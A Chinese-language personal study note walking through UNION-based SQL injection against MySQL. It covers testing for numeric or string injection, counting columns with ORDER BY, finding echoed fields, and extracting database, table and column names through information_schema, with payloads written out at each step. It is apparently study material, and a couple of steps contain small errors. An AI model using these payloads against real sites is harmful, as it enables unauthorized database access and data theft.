union注入即为用union联合查询来查询指定的数据,需要根据每一步的返回结果来判断和进行下一步操作。此仅为个人的学习笔记。
结构
联合查询的语句结构基本为:
select a from b union select c from d where e;
union会一次显示两个查询结果,使第一个查询语句作为正常内容,第二个作为查询语句来进行构造。
第一步:判断类型
数字型判断
共分3步判断步骤:
1.加单引号,如输入1’,对应的sql为:select * from table where id=1’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常。
2.加and 1=1,如输入1 and 1=1,对应的sql:select * from table where id=1’ and 1=1 没有语法错误且逻辑判断为正确,所以返回正常。
3.加and 1=2,如输入1 and 1=2,对应的sql:select * from table where id=1 and 1=2 没有语法错误但是逻辑判断为假,所以返回错误。
若满足上述步骤,则注入类型为数字型。
字符型判断
也分3步。
1.加单引号,对应的sql语句由于加单引号后变成三个单引号,则无法执行,程序会报错;
2.输入x’ and ‘1’='1,对应的Sql 语句:select * from table where id = ‘x’ and ‘1’=‘1’,语法正确,逻辑判断正确,所以返回正确。
3.输入x’and ‘1’='2,对应的Sql 语句:select * from where id = ‘x’ and ‘1’=‘2’,
语法正确,但逻辑判断错误,所以返回正确。
若满足上述步骤,则注入类型为字符型。
接下来的步骤均假设注入类型为字符型,开始union注入的几大步骤:
第二步:判断字段数
1.union有严格的约束条件,必须保证字段数一致,即两个查询结果有相同的列数,因此我们要对字段数进行判断。
2.可以使用order by number ,其作用为输出第number列。如:
1' order by 1 --+
3.一直增加number的数值直到报错,则前一位数字即为字段数。
第三步:判断回显点
1.判断回显点即为判断在哪个字段出会输出有效信息,可以输入如
# 第一种写法:
1' union select 1,2,3,...... limit 1,1 --+
# 第二种写法:
-1' union select 1,2,3,...... --+
联合查询的输出是严格按照顺序进行的,因此当id=1存在时会在第0行输出第一个sql语句查询到的结果,所以我们输入的数字就到了下一行。
其中:
第一种方法中 limit n,m 的作用为从第n行开始显示m行内容;
第二种方法使id=-1直接使查询结果为空,这样,就不会占用第0行。
2.找到回显字段后,就可以把SQL语句写在该位置,相应的结果也会输出。
第四步:获得数据库库名
1.在可以回显的位置输入database()可获得当前数据库名。假设2位置为回显的位置,如:
-1' union select 1,database(),...... --+
2.可以使用group_concat() 将所有内容写入一行并输出。
第五步:获得表名
利用的查询是:
(select group_concat(table_name) from information_schema.tables where table_schema='xxx' )
假设是在2为=位置回显,使用语句:
> -1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='xxx' ) --+
其中:information_schema是mysql自带的库,记录了该数据库所有的表名和字段名,该句的含义为:查找数据库中xxx库下的所有表名,group_concat() 将所有内容写入一行并输出。
第六步:获得字段名
同上,只需要一条语句:
> -1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘xxx’ and
table_name=‘xxx’) --+
即为查询数据库xxx下表xxx中的所有字段.
其中:Column_name 为字段/列名称。
最后:查数据
经过上述六步,获得了库名,表名,字段名后,在可以回显的位置输入SQL语句即可。